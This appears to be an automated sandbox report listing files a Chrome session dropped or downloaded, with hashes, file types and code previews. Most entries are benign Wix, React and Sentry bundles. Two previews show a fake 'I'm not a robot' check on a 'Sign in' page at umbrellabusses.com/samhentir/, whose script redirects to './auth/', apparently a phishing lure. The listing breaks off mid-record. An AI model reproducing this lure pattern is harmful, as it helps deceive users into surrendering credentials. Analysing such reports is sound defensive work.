                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[5652,6521,7116],{6395:(e,t,s)=>{s.d(t,{X:()=>u});const n=/^<([-A-Za-z0-9_?:]+)((?:\s+(?:x:)?[-A-Za-z0-9_]+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/,r=/^<\/([-A-Za-z0-9_?:]+)[^>]*>/,a=/((?:x:)?[-A-Za-z0-9_]+)(?:\s*=\s*(?:(?:"((?:\\.|[^"])*)")|(?:'((?:\\.|[^'])*)')|([^>\s]+)))?/g,l=h("area,base,basefont,br,col,frame,hr,img,input,isindex,link,meta,param,embed"),i=h("address,applet,blockquote,button,center,dd,del,dir,div,dl,dt,fieldset,form,frameset,hr,iframe,ins,isindex,li,map,menu,noframes,noscript,object,ol,p,pre,script,table,tbody,td,tfoot,th,thead,tr,ul"),o=h("a,abbr,acronym,applet,b,basefont,bdo,big,br,button,cite,code,del,dfn,em,font,i,iframe,img,input,ins,kbd,label,map,object,q,s,samp,script,select,small,span,strike,strong,sub,sup,textarea,tt,u,var"),c=h("colgroup,dd,dt,li,options,p,td,tfoot,th,thead,tr"),d=h("checked,compact,declare,defer,disabled,ismap,multip
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1100)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1217
                                                                                                                                                                                                                        Entropy (8bit):5.396017284784193
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:z/k/GGcl+F9Lx0I5C0WOpbRrftWOmvTJPkoHLRthBNZCz6xejOCckgKN:gt99Lx0I5OOpbRrfkOmLJMorfNZvx1DS
                                                                                                                                                                                                                        MD5:15BAE755A94C8E4FEDC748581EE318DE
                                                                                                                                                                                                                        SHA1:F2E8DAAE5569F4BFA5D2E9A48429292CEDF019F6
                                                                                                                                                                                                                        SHA-256:9510C51BA90309BB4FCF2C23C9C13405758368281799EA18E27981035FFE10CE
                                                                                                                                                                                                                        SHA-512:5227326FE2C96481F0B558984B3B91E3175F90F077FFF8E07C178D2FAFA0BBD4C352CD8E734DA272F91C48B98821E573A91D57F49C7387921F7CBF6ED6707FBE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[2177],{24309:(a,e,n)=>{n.r(e),n.d(e,{page:()=>m});var s=n(16537),t=n(77748),l=n(87711),o=n(20590),g=n(39218),i=n(10553),u=n(73157),p=n(45117);const r="landingPage",c=(0,t.Og)([l.Ji],(a=>{const e=()=>(a.get("masterPage")||{}).classNames||{},n=e=>{a.update({masterPage:{classNames:e}})},s=a=>{const e={...a};return delete e[r],e};return{async updateClassNamesOnPageWillMount(a){const t=e();if(a&&!t[r]){const a={...t,[r]:r};n(a)}if(!a&&t[r]){const a=s(t);n(a)}},async updateClassNamesOnPageWillUnMount(a){const t=e();if(a&&t[r]){const a=s(t);n(a)}}}})),d=(0,t.Og)([(0,t.KT)(o.Gp,u.U),u.$,g.Is,i.n,(0,t.lq)(p.By)],((a,{updateClassNamesOnPageWillMount:e,updateClassNamesOnPageWillUnMount:n},s,t,l)=>{const{isLandingPage:o}=a,g="masterPage"===s||l?.isLightbox(s),i=t["specs.thunderbolt.removeLandingPageClassNameOnUnmount"];return{name:"landingPage",pageWillMount:()=>{g||e(o)},pageWillUnmount:()=>{!g
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (34973)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):35145
                                                                                                                                                                                                                        Entropy (8bit):5.569331133720632
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:HL9d6HMRTmporjNkcEgQ1Js+ewi6Ac52Ptj5+dIuXuIV9plgOOPAAziN7itdLv:hvhMWcdIXUzN0Lv
                                                                                                                                                                                                                        MD5:A17384FC2F4B6159C47793DBC8E9AB63
                                                                                                                                                                                                                        SHA1:3A0DED11D1DD7B2678A298725ED2D8EA481323B6
                                                                                                                                                                                                                        SHA-256:394AAF357BD55CF18278F5BF3E2404C8B54AAF901FE060524BF7BCDF85FE3195
                                                                                                                                                                                                                        SHA-512:41FE00DDA24E5F638F134AB7972E614231D0FA572C2A02C1710E767C60BCCA30A1982931737A95F2B7CD67C3966F84AD0086A0194D1F856EB92CA70080018D02
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[Column_DefaultColumn].7f905244.bundle.min.js
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt[Column_DefaultColumn]",["react"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt[Column_DefaultColumn]"]=t(require("react")):e["rb_wixui.thunderbolt[Column_DefaultColumn]"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={5329:function(t){"use strict";t.exports=e},448:function(e){function t(){return e.exports=t=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},e.exports.__esModule=!0,e.exports.default=e.exports,t.apply(null,arguments)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports}},i={};function a(e){var n=i[e];if(void 0!==n)return n.exports;var r=i[e]={exports:{}};return t[e](r,r.exports,a),r.exports}a.n=function(e){var t=e&&e.__esModule?fu
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1150
                                                                                                                                                                                                                        Entropy (8bit):1.2100731437092027
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:3NhDllvlNl/khXhCC1111111111111111111111111111111111111111111111H:7Jq55555555555555R
                                                                                                                                                                                                                        MD5:B53CE85A6CCE2AE00037A6CA13C90866
                                                                                                                                                                                                                        SHA1:292D9AEB457AB7FEDBAD452854332AEFF267A78E
                                                                                                                                                                                                                        SHA-256:33C1436F8C40CA2582D091C449FCCC34ED9BF73F02526C5FDEF44F4F06C6321B
                                                                                                                                                                                                                        SHA-512:9271B4BD6B07C15662E9265359AD80CBEDF971C127F8C17EF289AE7A552C3BDA93A8416881493196E956FDC5B2A4DF03CBDA838F4203C7F7B12DCDBFE27B31CB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:............ .h.......(....... ..... .....@.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (945)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):131835
                                                                                                                                                                                                                        Entropy (8bit):5.376665898737896
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:C1/SrQwxn5J6IBuXZ2NInxb7w4BqZTXZlvA61i8+pxsdn9PvV6SdqbAR:755qZpAZxA61iz6Phkm
                                                                                                                                                                                                                        MD5:7D4842A904E5D5D1B19240075998B111
                                                                                                                                                                                                                        SHA1:FEB8DDC9D0566A4FA0971A6E1138658618CDACFE
                                                                                                                                                                                                                        SHA-256:35F4F974F4B2BCD44DA73963347F8952E341F83909E4498227D4E26B98F66F0D
                                                                                                                                                                                                                        SHA-512:E9AD75D3BAD3940E2062980702A6F02C0B719968A905D24572AF32E52FDA4E07B7069F95024940066D8B3BE2A0E75BCE591F49319AB53AF8E5E6DA65B8DA5379
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:/**. * @license React. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){/*. Modernizr 3.0.0pre (Custom Build) | MIT.*/.'use strict';(function(Q,zb){"object"===typeof exports&&"undefined"!==typeof module?zb(exports,require("react")):"function"===typeof define&&define.amd?define(["exports","react"],zb):(Q=Q||self,zb(Q.ReactDOM={},Q.React))})(this,function(Q,zb){function m(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,c=1;c<arguments.length;c++)b+="&args[]="+encodeURIComponent(arguments[c]);return"Minified React error #"+a+"; visit "+b+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}.function mb(a,b){Ab(a,b);Ab(a+"Capture",b)}function Ab(a,b){$b[a]=b;for(a=0;a<b.length;a++)cg.add(b[a])}function bj(a){if(Zd.call(dg,a))retu
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1066
                                                                                                                                                                                                                        Entropy (8bit):4.607175843325684
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:OPEhkACy7C/N3G+c/b7NLULvGo/uMS/eIGuBjC/zBRg/mBu7mfR1yM76C/G4r1fr:OPRCj3NYbLmMS1JCE9RMm45lCMf
                                                                                                                                                                                                                        MD5:44E338FD989F9D6749A708749DC39D90
                                                                                                                                                                                                                        SHA1:144405CE6055ED5C6D9E69BAB9E35727C522433A
                                                                                                                                                                                                                        SHA-256:9269AC3259784B8500287EE56AD8C757F09D20A4C913DD3E1E3929AA1D62522E
                                                                                                                                                                                                                        SHA-512:E9F483FA3F432F394DC4C0C235393E84EE40B77DD5EE881F6430336A96C073526F93A62697D437DEA5A948D692A2C83925F4C8FBCC185C9D557DA7D10C2104A8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://umbrellabusses.com/samhentir/
                                                                                                                                                                                                                        Preview:..<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Sign in</title>.. <link rel="stylesheet" href="./css/init.css?v=1736517172">.. <link rel="icon" href="./img/ffg.ico">..</head>..<body>.... <div.. class="capboxi".. >.. <div class="capboxi22">.. <div class="boxCapin">.. .. <div class="btinp">.. <input type="checkbox" id="rb" class="rb">.. <img src="" alt="rbi" class="close rbo">.. </div>.... <div class="bt2">.. <label for="rb" class="rblab">I'm not a robot</label>.. </div>.... </div>.... <div class="boxCapin3">.. <div class="imgbx">.. <img src="./img/flaretext.png" alt="flare">.. </div>.... <div class="imgtx">.. <a href="">Privacy</a>.. <span>.</span>.. <a href="">Terms</a>.. </div>.. </div>.. </div>.. </div>....
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (32056)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):32172
                                                                                                                                                                                                                        Entropy (8bit):5.387855792611775
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:HO3dCAQ0KIKNHgLdiZy/JwYzhsslUTt92S0pjEDn6Ezfj3I9to1+QkeIrPuu8iNQ:18iZKzODn6EzMOi7caXi
                                                                                                                                                                                                                        MD5:A235F3EB11853B5304271883D16D1CCB
                                                                                                                                                                                                                        SHA1:087F4C13886FC026FFCB0D3CC0660888241900BD
                                                                                                                                                                                                                        SHA-256:A7E4E26553B4657E012CD42044659E71B77843E04CB06B28E4E698883C57A653
                                                                                                                                                                                                                        SHA-512:7EE425D7B69F31FBFBA2F6DAA02073C41F971FAC14E8F0A92AF6CA0F167B9415E5E055AD282EFAADFFB3B0835C6B58AD7D6DB3BB6B68F3B1CFD10FDC2EEF3E8C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[3660],{53466:e=>{"use strict";e.exports=function(e,t,a){var r=e.split(t,a);if(r.length===a){var n=0;n="string"==typeof t?r.join(t).length:r.reduce((function(r,n,o){var s=0;return o+1<a&&(s=e.slice(r).match(t).shift().length),r+n.length+s}),0),r[a-1]+=e.slice(n)}return r}},36673:(e,t,a)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e,t){e.onmessage=function(a){var n=a.data,o=(0,r.parseChannelMessage)(n),s=o.id,i={data:o.payload,origin:a.origin,lastEventId:a.lastEventId,source:a.source,ports:a.ports};t(i,(function(t){e.postMessage((0,r.constructChannelMessage)(t,s))}))}};var r=a(54497)},92313:(e,t,a)=>{"use strict";var r,n=a(69549),o=a(54497),s=a(36673),i=(r=s)&&r.__esModule?r:{default:r};var c=function(){};e.exports=function(e){var t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:c;if(!e||"string"!=typeof e)throw new Error("listener function expects to
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):124860
                                                                                                                                                                                                                        Entropy (8bit):5.605709420725773
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:fwTfwHhSiCM3GFU3zoz90gT3yu1ysAzHMVcZzDwEyMdd8gB6Tuo2jntTQie+aC0V:YsBSiR3GF/zSzsAbQ4ahuaqXQfY61
                                                                                                                                                                                                                        MD5:859C551685A01F39CAB6296CBC086156
                                                                                                                                                                                                                        SHA1:E9C32C68C4FEBC50428A19AF92B5AFBF50DED2A9
                                                                                                                                                                                                                        SHA-256:552877C86B2673937CD1145593AAB68CEDC2E2037641AE4B37DFDDBCE746109F
                                                                                                                                                                                                                        SHA-512:E8687DE6239ADDA606828507CAAB618FBFA15C9565E6DB055ED4A0B68ABC2175872A62E4315F12F6A360E908A6FEB2F00CD2E981EA6D6647FF0731118EB544B4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/thunderbolt-commons.5848cc89.bundle.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[671],{37669:(e,t,o)=>{o.d(t,{D:()=>r,T:()=>n});var r={COURSE:"course",SERVICE:"service"},n={FIXED:"fixed",VARIED:"varied",NO_FEE:"no_fee",CUSTOM:"custom",UNKNOWN_RATE_TYPE:"unknown_rate_type"}},15490:(e,t,o)=>{o.d(t,{s:()=>r});const r={TYPES:{GRADIENT_LINEAR:"GradientLinear",GRADIENT_ELLIPSE:"GradientEllipse",GRADIENT_CIRCLE:"GradientCircle",GRADIENT_CONIC:"GradientConic"},CSS_FUNC:{RADIAL_GRADIENT:"radial-gradient",CONIC_GRADIENT:"conic-gradient",LINEAR_GRADIENT:"linear-gradient"},REPEATING:"repeating",DEG:"deg",AT_CENTER:"at center",CIRCLE:"circle",ELLIPSE:"ellipse",FROM:"from",PERCENTAGE:"percentage",RGBA:"rgba"}},58392:(e,t)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.DuplexerSocketArtifactId=t.wsVs=t.userChannel=t.wsClient=t.WixArtifactIdHeader=void 0,t.WixArtifactIdHeader="x-wix-artifact-id",t.wsClient="ws.manager",t.userChannel="@user-inbox",t.wsVs="ws.vs",t.DuplexerS
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):544
                                                                                                                                                                                                                        Entropy (8bit):4.804864965496654
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:tdwQdd4bdu889SW71W+ZFq1MCW71WCnxH7A1WPWQZNk:XBoh8FW1Mp4
                                                                                                                                                                                                                        MD5:1EF785F73AA281B7D101CC2C4B0914E5
                                                                                                                                                                                                                        SHA1:1CB069DCEE14E0450E90394AAA4C14893798ACB3
                                                                                                                                                                                                                        SHA-256:E32A78CB5F40778B7C8E0DE6A0F2C8FDA4C8E73D8D7BE98502976CEB1A6242CF
                                                                                                                                                                                                                        SHA-512:06E98E7A4D9C3E78FF5267BB49763B170FEA0B9B7588CD8A468CDEFD77A057CA1F378C87D943C647FE3A98A28231B20B3A4723D6BD24478C1359B2A2F0D8C0FA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:const rb = document.querySelector(".rb");..const rblab = document.querySelector(".rblab");..const rbo = document.querySelector(".rbo");....rb.addEventListener("change", () => {.. rb.classList.add("close");.. rbo.classList.remove("close");.. rblab.textContent = "Success"; .. rbo.src = "./img/good.png";.. rb.classList.add("close");.... setTimeout(() => {.. window.location.href = "./auth/".. rbo.classList.add("close");.. rb.classList.remove("close");.. rblab.textContent = "Success";.. rb.checked = false;.. }, 500);..});
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):98646
                                                                                                                                                                                                                        Entropy (8bit):5.340724382044016
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:JZXBGeOGO7l9OeOsOZOiOYO8juy0hzRvEjSucHvSGBV7SqEb7V:dMjzYDJZuy0hzRcHG2qs
                                                                                                                                                                                                                        MD5:52AF04FEFA6DEC50032624DA0190CFFE
                                                                                                                                                                                                                        SHA1:4F7D0F2FBA99AF0DEE90C66FCAEBDCE0E2891FDF
                                                                                                                                                                                                                        SHA-256:53E288E98D3F58506CEF87C0DA96D5891AA6C88A2F08A66B2BC4695DBCA2543F
                                                                                                                                                                                                                        SHA-512:A448FDAF7B7AF7FAC6D31ED34740CB5BBCA4C281AFAB3DAFA69B240B57BE07BE33BB6F421A0C5FC9F1B642A1EB13110AF8E8BDB72077B731EF0B78C7BFFBC963
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt_menu.647b0eb4.bundle.min.js
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react"),require("react-dom")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt_menu",["react","reactDOM"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt_menu"]=t(require("react"),require("react-dom")):e["rb_wixui.thunderbolt_menu"]=t(e.React,e.ReactDOM)}("undefined"!=typeof self?self:this,(function(e,t){return function(){var n={39504:function(e,t,n){var r=n(82016);e.exports=r.create("HamburgerCloseButton1855956175",{classes:{root:"HamburgerCloseButton1855956175__root"},vars:{},stVars:{},keyframes:{},layers:{}},"",-1,e.id)},15076:function(e,t,n){var r=n(82016);e.exports=r.create("HamburgerMenuContainer502174924",{classes:{root:"HamburgerMenuContainer502174924__root"},vars:{},stVars:{},keyframes:{},layers:{}},"",-1,e.id)},35147:function(e,t,n){var r=n(82016);e.exports=r.create("HamburgerOpenButton3651513085",{classes:{root:"HamburgerOpenButton3651513085__root",nav:"Hamb
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65125)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):65254
                                                                                                                                                                                                                        Entropy (8bit):5.186764349436421
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:H30nlF9rR4ypFCq1PXVQBJBzDoc7J/wz/FdJqu/uY7IDqisHK3OsMdww6o6dqUdW:HOn9rR4oOF3zjww4Ud4hz
                                                                                                                                                                                                                        MD5:3629A21319D5273A0E5422894398763A
                                                                                                                                                                                                                        SHA1:2EC80AAFAFA54CE2D289247961335DD4DDE988E4
                                                                                                                                                                                                                        SHA-256:FC282CEB777458C14CD5A30CA54A0BA2B409136658B467C25BF929C185AD68F4
                                                                                                                                                                                                                        SHA-512:DCC43DE82B45E0E0DD551505C15BB984992A5AC2A2E1E58603CE76ADF1D32C191FD13CE15F9346E6BACF368A24ED4884A78DBC46E7EB340F5FD2B3E3747917E3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:/*! @sentry/browser 6.18.2 (22f518e) | https://github.com/getsentry/sentry-javascript */.var Sentry=function(t){var n=function(t,r){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,n){t.__proto__=n}||function(t,n){for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(t[r]=n[r])},n(t,r)};function r(t,r){if("function"!=typeof r&&null!==r)throw new TypeError("Class extends value "+String(r)+" is not a constructor or null");function i(){this.constructor=t}n(t,r),t.prototype=null===r?Object.create(r):(i.prototype=r.prototype,new i)}var i,e=function(){return e=Object.assign||function(t){for(var n,r=1,i=arguments.length;r<i;r++)for(var e in n=arguments[r])Object.prototype.hasOwnProperty.call(n,e)&&(t[e]=n[e]);return t},e.apply(this,arguments)};function o(t){var n="function"==typeof Symbol&&Symbol.iterator,r=n&&t[n],i=0;if(r)return r.call(t);if(t&&"number"==typeof t.length)return{next:function(){return t&&i>=t.length&&(t=void 0),{value:t&&t[i++],done:!t}}};throw
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):7846
                                                                                                                                                                                                                        Entropy (8bit):7.598530534985526
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:EmeOSWsTsZkDuX/gzauEMXS2+oMugK8uEvR5aMzwyKrbE6T:EYHsTTDkgQ2+DJ/agMr
                                                                                                                                                                                                                        MD5:F4647F715C3AB6C3C4A247079B88EF93
                                                                                                                                                                                                                        SHA1:56A654F9EC31D4ADCB2106972E1147E05ECE22BC
                                                                                                                                                                                                                        SHA-256:182E3042FDA996F221F9B78813D814322FEC335E45569C2DD66BE1168A457795
                                                                                                                                                                                                                        SHA-512:EC3D1C506CDE33E07DA38F8C8C2F88CDDF828BCCFDB9FBC24EEEB5DB586F6684208C15792E3302CAF10E4650B935EFF9DFA0409219DBC0D36D36152471463B6E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:.PNG........IHDR..............x......gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<...$IDATx.....eWY'.J .B..w ....>.(..tP.....q`$..K.3=..,h..sn...c...q@...EQ$3q.4.H*u..N...j..a.<..I...I.>......GU}....../....{...w.}.35.................................................................................................................................................................................................................................................................fG.....&.[5.w..x_......N.(........:.m..M.k........_..p_.O.U..>57.....On..r..Q..9.>h...{.!./...Sn.[...y.~..7.{..H..\:W...........T5..r....[...M..K9....O....0..z...........%(.{g.....0..W.....o.w../.G..x.)yV.5...2..~0.?....5uq{.;.e.......lh..SG..:.....>...`.......lH.\.;..]~tC?.....s..'..!.l(.o.......f_5..|.....an.wjU.Ou...R.y....:.l..../..j..v....=.vo..f......i.;P.......:e....M..F..7.M...[..}.....uo.=Z7.A..;..j...`.-.._..G7..M.8...@..Q...N..7.w...Y......`.......8,u.....
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):95126
                                                                                                                                                                                                                        Entropy (8bit):5.331460772202459
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:nB6MxQXiOrqlaY7DRt5uQ3QzwDQ9USzA119zJwh:nkMxQy6ql1bvAzwDQ9zzAb9zJk
                                                                                                                                                                                                                        MD5:09C587F361BED7D0C70E8DCE1F76F0E7
                                                                                                                                                                                                                        SHA1:27C0F7FD9EB5653A7C961A95E096B79EDCE4DB24
                                                                                                                                                                                                                        SHA-256:8F0DA91B68BB81F656A55474D780E322217F769F300722A831F642767664A725
                                                                                                                                                                                                                        SHA-512:4F9B5922E3A326D755BB149A7CD2B529F8E3F07F7E9AAA2A6DC27ECE6E3CEFC0AE9411C6136308134927F79E60042F1DB4DAE3571D3FA862F6097CBD3B51AEC1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[3909],{68747:(t,e,a)=>{a.r(e),a.d(e,{AnimationManager:()=>M,MotionSymbol:()=>T.h,animationApiFactory:()=>_r,page:()=>Dr});var n={};a.r(n),a.d(n,{initialFrame:()=>se,prepare:()=>ue,style:()=>me,web:()=>fe});var r={};a.r(r),a.d(r,{initialFrame:()=>se,style:()=>ge,web:()=>pe});var o={};a.r(o),a.d(o,{initialFrame:()=>se,style:()=>ye,web:()=>he});var i={};a.r(i),a.d(i,{initialFrame:()=>se,style:()=>Oe,web:()=>ke});var s={};a.r(s),a.d(s,{initialFrame:()=>se,prepare:()=>Pe,style:()=>Ye,web:()=>Ie});var c={};a.r(c),a.d(c,{initialFrame:()=>se,prepare:()=>Te,style:()=>Se,web:()=>Xe});var l={};a.r(l),a.d(l,{initialFrame:()=>se,style:()=>Me,web:()=>_e});var f={};a.r(f),a.d(f,{initialFrame:()=>se,prepare:()=>Ze,style:()=>Re,web:()=>Fe});var m={};a.r(m),a.d(m,{initialFrame:()=>se,style:()=>Ce,web:()=>He});var u={};a.r(u),a.d(u,{initialFrame:()=>se,prepare:()=>je,style:()=>Ue,web:()=>Le});var d={};
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4373)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):4490
                                                                                                                                                                                                                        Entropy (8bit):5.324674926401483
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:z/Zf2ZTh/sfKwCkHosYbGlG1ldJ3Pi/nY6szZqAwcRUcRwvM:zY/7kI7SlGpJ3qxs5w0
                                                                                                                                                                                                                        MD5:444F7A86B5AD059A20281C7562749F99
                                                                                                                                                                                                                        SHA1:6AD617D35AABCF8A2FE6E3B09DB3575C0A212F9F
                                                                                                                                                                                                                        SHA-256:77F04D91D032BA8F4F45EACC916BCBE3D3CBC748EB3567EFE5226686D0355512
                                                                                                                                                                                                                        SHA-512:B685A8E35D75C5EEDABEB1A06E5E0DADE6537879CC07748597877C935266BF650D81BF207F992FA3FF543447D7AEF18DF4601F31CC20368A0CB0B64585F36672
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/group_32.ca7bb96a.chunk.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[8908],{13396:(e,t,n)=>{n.r(t),n.d(t,{PageTransitionsSymbol:()=>r.e$,editor:()=>v,editorPage:()=>h,page:()=>_});var o=n(77748),i=n(20590),s=n(39218),a=n(32166),r=n(86046),d=n(41596);const l=(0,o.Og)([(0,o.KT)(i.Gp,r.UU),(0,o.KT)(i.wk,r.UU),s.dB,d.s,a.RV],((e,t,n,o,i)=>{const s=!!i&&"startViewTransition"in i.document&&e.shouldUseViewTransition;return{name:"pageTransitions",pageDidMount(o){const i=t.get(),s=i?.mountDoneHandler;s&&s({transitionName:e.transitionName,pageId:o}),(i?.isFirstMount??1)&&n.notifyPageTransitionsCompleted(o),t.update((e=>({...e,isFirstMount:!1})))},pageWillUnmount({contextId:e}){const a=t.get();if(s){const e=()=>{o.getScrollYHistoryState()||o.scrollToTop()},s=e=>{n.notifyPageTransitionsCompleted(e),o.getScrollYHistoryState()&&o.restoreScrollPosition()};!function(e,t,n,o){let i,s;t.document.documentElement.dataset.viewTransition="page-transition";const a=document.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (34527)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):34643
                                                                                                                                                                                                                        Entropy (8bit):5.435302897493357
                                                                                                                                                                                                                        Encrypted:false
